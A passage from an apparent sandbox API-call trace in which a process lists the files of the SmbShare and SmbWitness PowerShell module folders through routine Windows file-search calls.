dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.325] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.325] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0265.325] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0265.326] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0265.326] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.326] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0265.327] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0265.327] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0265.327] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0265.327] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0265.327] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0265.327] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0265.328] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.328] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0265.328] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0265.328] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0265.328] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.328] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0265.329] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 0 [0265.329] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.329] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1")) returned 0x20 [0265.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.329] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0265.329] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0265.329] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.330] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.330] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.330] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0265.330] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0265.330] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0265.331] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 0 [0265.331] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.331] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0265.331] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0265.331] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.331] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.331] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.332] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0265.332] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0265.332] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0265.332] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.332] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.332] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0265.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.332] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0265.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.333] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0265.333] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0265.333] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.333] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.333] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.333] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0265.333] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0265.333] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, 